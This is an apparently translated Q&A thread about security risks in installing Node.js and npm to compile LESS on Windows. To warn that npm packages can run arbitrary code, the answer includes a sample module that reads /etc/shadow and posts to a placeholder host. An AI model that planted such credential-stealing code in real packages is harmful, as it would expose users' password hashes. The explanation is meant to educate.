Mar*_*wad 5 windows less node.js
这就是我问的原因:
为了lessc在Windows下使用编译器,我必须根据这个指南安装Node.js和NPM: http: //lesscss.org/#getting-started
所以基本上,我只是:
lessc使用npm install -g less详细问题:
我应该注意什么安全隐患吗?Node.js 是否开放任何端口?它在后台运行吗?它会自动更新吗?
我应该注意什么安全隐患吗?
是的,当然正如 @seven-phases-max 在评论中已经指出的那样,风险是您运行不安全的脚本或执行您不想要的任何操作。
在上面,您-g在安装 less 时使用了(全局)标志,这意味着您在系统上以超级用户(管理员)身份安装 less。正如 @Explosion_Pills 已经解释的那样:“安装可以运行任意脚本,并且使用 sudo 运行它可能非常危险!”
AFAIK 每个人都可以在 npm 上发布节点模块,所以我可以发布一个模块并安装它,例如包含:
var request = require('request'),
fs = require('fs');
fs.readFile('/etc/shadow', 'utf8', function (err,data) {
if (err) {
return console.log(err);
}
request.post(
'http://www.example.com/passwords',
{ form: { key: 'value' } },
function (error, response, body) {
if (!error && response.statusCode == 200) {
console.log(body);
}
}
);
});
另请查看节点安全项目。
| 归档时间: |
|
| 查看次数: |
3261 次 |
| 最近记录: |